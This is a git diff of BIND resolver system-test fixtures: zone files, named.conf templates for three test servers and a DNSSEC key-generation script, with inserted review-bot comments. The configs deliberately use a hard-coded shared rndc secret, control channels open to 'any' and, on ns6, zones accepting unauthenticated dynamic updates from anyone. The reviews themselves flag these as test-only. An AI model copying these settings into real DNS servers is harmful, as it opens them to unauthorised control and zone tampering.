10.53.0.6 diff --git a/bin/tests/system/resolver/ns4/child.server.db b/bin/tests/system/resolver/ns4/child.server.db new file mode 100644 index 0000000..188eb4a --- /dev/null +++ b/bin/tests/system/resolver/ns4/child.server.db 
@@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns +ns A 10.53.0.4 +foo TXT "From NS 4" +bar TXT "From NS 4" diff --git a/bin/tests/system/resolver/ns4/moves.db b/bin/tests/system/resolver/ns4/moves.db new file mode 100644 index 0000000..dc1c396 --- /dev/null +++ b/bin/tests/system/resolver/ns4/moves.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns.server. +foo TXT "From NS 4" +bar TXT "From NS 4" diff --git a/bin/tests/system/resolver/ns4/named.conf.in b/bin/tests/system/resolver/ns4/named.conf.in new file mode 100644 index 0000000..74a4066 --- /dev/null +++ b/bin/tests/system/resolver/ns4/named.conf.in 
@@ -0,0 +1,72 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS4
+
+options {
+ query-source address 10.53.0.4 dscp 4;
+ notify-source 10.53.0.4 dscp 5;
+ transfer-source 10.53.0.4 dscp 6;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ /* test that named loads with root-delegation-only */
+ root-delegation-only;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
+
+zone "moves" {
+ type primary;
+ file "moves.db";
+};
+
+zone "child.server" {
+ type primary;
+ file "child.server.db";
+};
+
+zone "tld" {
+ type primary;
+ file "tld.db";
+};
+
+zone "broken" {
+ type primary;
+ file "broken.db";
+};
+
+zone "sourcens" {
+ type primary;
+ file "sourcens.db";
+};
+
+zone "v4only.net" {
+ type primary;
+ file "v4only.net.db";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
diff --git a/bin/tests/system/resolver/ns4/named.noaa b/bin/tests/system/resolver/ns4/named.noaa
new file mode 100644
index 0000000..be78cc2
--- /dev/null
+++ b/bin/tests/system/resolver/ns4/named.noaa
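Review bot: The `key rndc_key` block hard-codes `algorithm hmac-sha256;`, while ns1/named.conf.in in this same commit takes the algorithm from `@DEFAULT_HMAC@`; ns5/named.conf.in and ns6/named.conf.in hard-code it too. If that substitution ever expands to a different algorithm, ns1 and the other servers will disagree on the control-channel key, and whichever side does not match the rndc client configuration (not visible here) will refuse commands. Use `algorithm @DEFAULT_HMAC@;` in all four files. The secret `"1234abcd8765"` is shared by every server and `controls` allows `any`, which is acceptable for fixtures bound to 10.53.0.x but deserves a `/* test-only key */` comment so the block is not copied into a real configuration.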
@@ -0,0 +1,12 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +Add -T noaa. diff --git a/bin/tests/system/resolver/ns4/root.db b/bin/tests/system/resolver/ns4/root.db new file mode 100644 index 0000000..71d90e3 --- /dev/null +++ b/bin/tests/system/resolver/ns4/root.db @@ -0,0 +1,34 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA marka.isc.org. a.root.servers.nil. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.4 +all-cnames NS cname.tld +delegation-only. NS ns.delegation-only. +ns.delegation-only. A 10.53.0.6 +example.net. NS ns.example.net. +ns.example.net. A 10.53.0.6 +no-questions. NS ns.no-questions. +ns.no-questions. A 10.53.0.8 +formerr-to-all. NS ns.formerr-to-all. +ns.formerr-to-all. A 10.53.0.8 +sourcens. NS ns.sourcens. +ns.sourcens. A 10.53.0.4 +targetns. NS ns.targetns. +ns.targetns. A 10.53.0.6 diff --git a/bin/tests/system/resolver/ns4/sourcens.db b/bin/tests/system/resolver/ns4/sourcens.db new file mode 100644 index 0000000..3567cfb --- /dev/null +++ b/bin/tests/system/resolver/ns4/sourcens.db 
@@ -0,0 +1,91 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; This zone contains a set of delegations with varying numbers of NS +; records. This is used to check that BIND is limiting the number of +; NS records it follows when resolving a delegation. It tests all +; numbers of NS records up to twice the number followed. + +$TTL 60 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns +ns A 10.53.0.4 + +target1 NS ns.fake11.targetns. + +target2 NS ns.fake21.targetns. + NS ns.fake22.targetns. + +target3 NS ns.fake31.targetns. + NS ns.fake32.targetns. + NS ns.fake33.targetns. + +target4 NS ns.fake41.targetns. + NS ns.fake42.targetns. + NS ns.fake43.targetns. + NS ns.fake44.targetns. + +target5 NS ns.fake51.targetns. + NS ns.fake52.targetns. + NS ns.fake53.targetns. + NS ns.fake54.targetns. + NS ns.fake55.targetns. + +target6 NS ns.fake61.targetns. + NS ns.fake62.targetns. + NS ns.fake63.targetns. + NS ns.fake64.targetns. + NS ns.fake65.targetns. + NS ns.fake66.targetns. + +target7 NS ns.fake71.targetns. + NS ns.fake72.targetns. + NS ns.fake73.targetns. + NS ns.fake74.targetns. + NS ns.fake75.targetns. + NS ns.fake76.targetns. + NS ns.fake77.targetns. + +target8 NS ns.fake81.targetns. + NS ns.fake82.targetns. + NS ns.fake83.targetns. + NS ns.fake84.targetns. + NS ns.fake85.targetns. + NS ns.fake86.targetns. + NS ns.fake87.targetns. + NS ns.fake88.targetns. + +target9 NS ns.fake91.targetns. + NS ns.fake92.targetns. + NS ns.fake93.targetns. + NS ns.fake94.targetns. + NS ns.fake95.targetns. + NS ns.fake96.targetns. 
+ NS ns.fake97.targetns. + NS ns.fake98.targetns. + NS ns.fake99.targetns. + +target10 NS ns.fake101.targetns. + NS ns.fake102.targetns. + NS ns.fake103.targetns. + NS ns.fake104.targetns. + NS ns.fake105.targetns. + NS ns.fake106.targetns. + NS ns.fake107.targetns. + NS ns.fake108.targetns. + NS ns.fake109.targetns. + NS ns.fake1010.targetns. diff --git a/bin/tests/system/resolver/ns4/tld1.db b/bin/tests/system/resolver/ns4/tld1.db new file mode 100644 index 0000000..03d7908 --- /dev/null +++ b/bin/tests/system/resolver/ns4/tld1.db @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns.tld. +ns A 10.53.0.4 +$TTL 5 +to-be-removed NS ns.to-be-removed +ns.to-be-removed A 10.53.0.6 +fetch.tld. NS ns.fetch.tld. +ns.fetch.tld. A 10.53.0.6 +no-edns-version.tld. NS ns.no-edns-version.tld. +ns.no-edns-version.tld. A 10.53.0.6 +edns-version.tld. NS ns.edns-version.tld. +ns.edns-version.tld. A 10.53.0.7 +cname CNAME ns7 +ns7 A 10.53.0.7 +mixedttl 10 A 10.0.0.1 +mixedttl 15 TXT a TXT record +mixedttl 20 AAAA 2001:db8::1 diff --git a/bin/tests/system/resolver/ns4/tld2.db b/bin/tests/system/resolver/ns4/tld2.db new file mode 100644 index 0000000..c3a96d9 --- /dev/null +++ b/bin/tests/system/resolver/ns4/tld2.db 
@@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns.tld. +ns A 10.53.0.4 +fetch.tld. NS ns.fetch.tld. +ns.fetch.tld. A 10.53.0.6 +fetchall 10 A 1.2.3.4 +fetchall 10 AAAA ::1 +fetchall 10 TXT A short ttl +no-edns-version.tld. NS ns.no-edns-version.tld. +ns.no-edns-version.tld. A 10.53.0.6 +edns-version.tld. NS ns.edns-version.tld. +ns.edns-version.tld. A 10.53.0.7 +cname CNAME ns7 +ns7 A 10.53.0.7 +mixedttl 10 A 10.0.0.1 +mixedttl 15 TXT a TXT record +mixedttl 20 AAAA 2001:db8::1 diff --git a/bin/tests/system/resolver/ns4/v4only.net.db b/bin/tests/system/resolver/ns4/v4only.net.db new file mode 100644 index 0000000..b097f3a --- /dev/null +++ b/bin/tests/system/resolver/ns4/v4only.net.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS v4.nameserver. + A 10.0.0.1 +* CNAME @ diff --git a/bin/tests/system/resolver/ns5/child.server.db b/bin/tests/system/resolver/ns5/child.server.db new file mode 100644 index 0000000..2517b6c 
--- /dev/null +++ b/bin/tests/system/resolver/ns5/child.server.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns +ns A 10.53.0.5 +foo TXT "From NS 5" +bar TXT "From NS 5" diff --git a/bin/tests/system/resolver/ns5/moves.db b/bin/tests/system/resolver/ns5/moves.db new file mode 100644 index 0000000..57f4e91 --- /dev/null +++ b/bin/tests/system/resolver/ns5/moves.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns.server. +foo TXT "From NS 5" +bar TXT "From NS 5" diff --git a/bin/tests/system/resolver/ns5/named.conf.in b/bin/tests/system/resolver/ns5/named.conf.in new file mode 100644 index 0000000..eada94c --- /dev/null +++ b/bin/tests/system/resolver/ns5/named.conf.in 
@@ -0,0 +1,60 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +options { + query-source address 10.53.0.5 dscp 7; + notify-source 10.53.0.5 dscp 8; + transfer-source 10.53.0.5 dscp 9; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + querylog yes; + prefetch 4 10; +}; + +server 10.53.0.7 { + edns-version 0; +}; + +zone "." { + type hint; + file "root.hint"; +}; + +zone "moves" { + type primary; + file "moves.db"; +}; + +zone "child.server" { + type primary; + file "child.server.db"; +}; + +zone "delegation-only" { + type delegation-only; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; diff --git a/bin/tests/system/resolver/ns5/root.hint b/bin/tests/system/resolver/ns5/root.hint new file mode 100644 index 0000000..3685f54 --- /dev/null +++ b/bin/tests/system/resolver/ns5/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.4 
diff --git a/bin/tests/system/resolver/ns6/broken.db b/bin/tests/system/resolver/ns6/broken.db new file mode 100644 index 0000000..85b36bf --- /dev/null +++ b/bin/tests/system/resolver/ns6/broken.db @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ IN SOA ns hostmaster 1 1800 900 604800 600 +@ IN NS ns +ns IN A 10.53.0.6 +ns0 IN A 10.53.0.6 +ns1 IN A 10.53.0.6 +ns2 IN A 10.53.0.6 +ns3 IN A 10.53.0.6 +ns4 IN A 10.53.0.6 +ns5 IN A 10.53.0.6 +ns6 IN A 10.53.0.6 +ns7 IN A 10.53.0.6 +ns8 IN A 10.53.0.6 +ns9 IN A 10.53.0.6 +$TTL 1 +@ IN A 10.53.0.6 +www.sub IN A 10.53.0.6 diff --git a/bin/tests/system/resolver/ns6/delegation-only.db b/bin/tests/system/resolver/ns6/delegation-only.db new file mode 100644 index 0000000..b144338 --- /dev/null +++ b/bin/tests/system/resolver/ns6/delegation-only.db 
@@ -0,0 +1,33 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ IN SOA ns marka.isc.org. 1 0 0 0 120 +@ IN NS ns +@ IN DNSKEY 256 3 7 AwEAAY9437GPWJHzBeR4FP6eJAie7gh2QSM6LUnbDAHvHOx8MNqgSVRM PZka2rAgivb65/MkT1lXRUegj91iRFP3iggTpCgvdUbcBjsYrdODsrwF YUMIUl1pU0lH9x7KvfFUOfSmG+Rk5UHUWuRZbNyc65Sq69iFXg5c11+8 MAkRoeDF +; +; Delegation only test CDS and CDNSKEY records. These should be +; returned even if delegation-only is set for this zone. +; +@ IN A 1.2.3.4 +@ IN AAAA c::1.2.3.4 +@ IN CDS 12023 7 2 36FB69A752615831B47EA6EF9EA4619D0FB08ABDA69EA3ED200F4C02FF4921D4 +@ IN CDNSKEY 256 3 7 AwEAAY9437GPWJHzBeR4FP6eJAie7gh2QSM6LUnbDAHvHOx8MNqgSVRM PZka2rAgivb65/MkT1lXRUegj91iRFP3iggTpCgvdUbcBjsYrdODsrwF YUMIUl1pU0lH9x7KvfFUOfSmG+Rk5UHUWuRZbNyc65Sq69iFXg5c11+8 MAkRoeDF +; +; Delegation only test CDS and CDNSKEY records. These should be rejected +; as they are not at the zone apex. +; +a IN A 1.2.3.4 +aaaa IN AAAA c::1.2.3.4 +cds IN CDS 21366 7 1 E6C1716CFB6BDC84E84CE1AB5510DAC69173B5B2 +cdnskey IN CDNSKEY 256 3 7 AwEAAY9437GPWJHzBeR4FP6eJAie7gh2QSM6LUnbDAHvHOx8MNqgSVRM PZka2rAgivb65/MkT1lXRUegj91iRFP3iggTpCgvdUbcBjsYrdODsrwF YUMIUl1pU0lH9x7KvfFUOfSmG+Rk5UHUWuRZbNyc65Sq69iFXg5c11+8 MAkRoeDF +; +ns IN A 10.53.0.6 diff --git a/bin/tests/system/resolver/ns6/ds.example.net.db.in b/bin/tests/system/resolver/ns6/ds.example.net.db.in new file mode 100644 index 0000000..fad382b --- /dev/null +++ b/bin/tests/system/resolver/ns6/ds.example.net.db.in 
@@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ IN SOA ns hostmaster 1 1800 900 604800 600 +@ IN NS ns +ns IN A 10.53.0.6 diff --git a/bin/tests/system/resolver/ns6/example.net.db.in b/bin/tests/system/resolver/ns6/example.net.db.in new file mode 100644 index 0000000..740804a --- /dev/null +++ b/bin/tests/system/resolver/ns6/example.net.db.in @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ IN SOA ns hostmaster 1 1800 900 604800 600 +@ IN NS ns +@ IN MX 0 mail +ns IN A 10.53.0.6 +mail IN A 10.53.0.6 +fetch 10 IN TXT A short ttl +non-zero 10 IN TXT A short ttl +zero 0 IN TXT A zero ttl +$TTL 13 +ds IN NS ns.ds +ns.ds IN A 10.53.0.6 diff --git a/bin/tests/system/resolver/ns6/fetch.tld.db b/bin/tests/system/resolver/ns6/fetch.tld.db new file mode 100644 index 0000000..1d59e5a --- /dev/null +++ b/bin/tests/system/resolver/ns6/fetch.tld.db 
@@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.fetch.tld. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns.fetch.tld. +ns.fetch.tld. A 10.53.0.6 + +@ 13 TXT A short ttl diff --git a/bin/tests/system/resolver/ns6/keygen.sh b/bin/tests/system/resolver/ns6/keygen.sh new file mode 100644 index 0000000..e992154 --- /dev/null +++ b/bin/tests/system/resolver/ns6/keygen.sh 
@@ -0,0 +1,39 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+#
+# We use rsasha256 here to get a ZSK + KSK that don't fit in 512 bytes.
+#
+zone=ds.example.net
+zonefile="${zone}.db"
+infile="${zonefile}.in"
+cp $infile $zonefile
+ksk=$($KEYGEN -q -a rsasha256 -fk $zone)
+zsk=$($KEYGEN -q -a rsasha256 -b 2048 $zone)
+cat $ksk.key $zsk.key >> $zonefile
+$SIGNER -P -o $zone $zonefile > /dev/null
+
+zone=example.net
+zonefile="${zone}.db"
+infile="${zonefile}.in"
+cp $infile $zonefile
+ksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $zone)
+zsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} $zone)
+cat $ksk.key $zsk.key dsset-ds.example.net$TP >> $zonefile
+$SIGNER -P -o $zone $zonefile > /dev/null
+
+# Configure a static key to be used by delv
+keyfile_to_static_ds $ksk > ../ns5/trusted.conf
diff --git a/bin/tests/system/resolver/ns6/moves.db b/bin/tests/system/resolver/ns6/moves.db
new file mode 100644
index 0000000..06634ee
--- /dev/null
+++ b/bin/tests/system/resolver/ns6/moves.db
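Review bot: Error handling in keygen.sh rests entirely on the `-e` in the `#!/bin/sh -e` line, which is ignored when the script is started as `sh keygen.sh` or through `$SHELL`; how it is invoked is not visible in this hunk. In that case a failing `$KEYGEN` leaves `$ksk` or `$zsk` empty, the `cat $ksk.key $zsk.key >> $zonefile` line fails without stopping the script, and `$SIGNER` and `keyfile_to_static_ds` still run, so `../ns5/trusted.conf` can be written from an incomplete key set. Put `set -e` as the first command after the licence header so the behaviour does not depend on the caller. Quoting the expansions, e.g. `cp "$infile" "$zonefile"`, would be a cheap addition.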
@@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns.server. +foo TXT "From NS 6" +bar TXT "From NS 6" diff --git a/bin/tests/system/resolver/ns6/named.conf.in b/bin/tests/system/resolver/ns6/named.conf.in new file mode 100644 index 0000000..9ed68be --- /dev/null +++ b/bin/tests/system/resolver/ns6/named.conf.in 
@@ -0,0 +1,101 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS6
+
+options {
+ query-source address 10.53.0.6 dscp 10;
+ notify-source 10.53.0.6 dscp 11;
+ transfer-source 10.53.0.6 dscp 12;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.6; };
+ listen-on-v6 { fd92:7065:b8e:ffff::6; };
+ recursion no;
+ dnssec-validation no;
+ querylog yes;
+ statistics-file "named.stats";
+ /*
+ * test that named loads with root-delegation-only that
+ * has a exclude list.
+ */
+ root-delegation-only exclude { "a"; };
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
+
+zone "example.net" {
+ type primary;
+ file "example.net.db.signed";
+ allow-update { any; };
+};
+
+zone "ds.example.net" {
+ type primary;
+ file "ds.example.net.db.signed";
+ allow-update { any; };
+};
+
+zone "to-be-removed.tld" {
+ type primary;
+ file "to-be-removed.tld.db";
+ allow-update { any; };
+};
+
+zone "broken" {
+ type primary;
+ file "broken.db";
+ allow-update { any; };
+};
+
+zone "redirect.com" {
+ type primary;
+ file "redirect.com.db";
+};
+
+zone "tld1" {
+ type primary;
+ file "tld1.db";
+};
+
+zone "no-edns-version.tld" {
+ type primary;
+ file "no-edns-version.tld.db";
+};
+
+zone "delegation-only" {
+ type primary;
+ file "delegation-only.db";
+};
+
+zone "fetch.tld" {
+ type primary;
+ file "fetch.tld.db";
+};
+
+zone "targetns" {
+ type primary;
+ file "targetns.db";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
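Review bot: Four zones here (`example.net`, `ds.example.net`, `to-be-removed.tld`, `broken`) carry `allow-update { any; };`, which accepts unauthenticated dynamic updates from any address that can reach the listener, and this server also listens on `fd92:7065:b8e:ffff::6`. Nothing in the file says why; presumably the test script changes these zones with dynamic updates, but that is not visible in this hunk. Add a comment above the first of them, e.g. `/* test fixture: the test script updates this zone without a key; do not reuse outside the test network */`, or narrow the ACL to the test addresses if the script permits it. The comment on `root-delegation-only` should read "an exclude list".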
diff --git a/bin/tests/system/resolver/ns6/no-edns-version.tld.db b/bin/tests/system/resolver/ns6/no-edns-version.tld.db new file mode 100644 index 0000000..9ab654d --- /dev/null +++ b/bin/tests/system/resolver/ns6/no-edns-version.tld.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ SOA . . 0 0 0 0 0 +@ NS ns +ns A 10.53.0.6 diff --git a/bin/tests/system/resolver/ns6/redirect.com.db b/bin/tests/system/resolver/ns6/redirect.com.db new file mode 100644 index 0000000..f79f6dd --- /dev/null +++ b/bin/tests/system/resolver/ns6/redirect.com.db @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ IN SOA ns hostmaster 1 1800 900 604800 600 +@ IN NS ns +ns IN A 10.53.0.6 + +; 10.53.1.* are non-responsive IP addresses +$GENERATE 1-100 ns$.fake IN A 10.53.1.$ +$GENERATE 101-200 ns$.fake IN A 10.53.1.${-100} +$GENERATE 201-300 ns$.fake IN A 10.53.1.${-200} +$GENERATE 301-400 ns$.fake IN A 10.53.1.${-300} +$GENERATE 401-500 ns$.fake IN A 10.53.1.${-400} +$GENERATE 501-600 ns$.fake IN A 10.53.1.${-500} +$GENERATE 601-700 ns$.fake IN A 10.53.1.${-600} +$GENERATE 701-800 ns$.fake IN A 10.53.1.${-700} +$GENERATE 801-900 ns$.fake IN A 10.53.1.${-800} +$GENERATE 901-1000 ns$.fake IN A 10.53.1.${-900} 
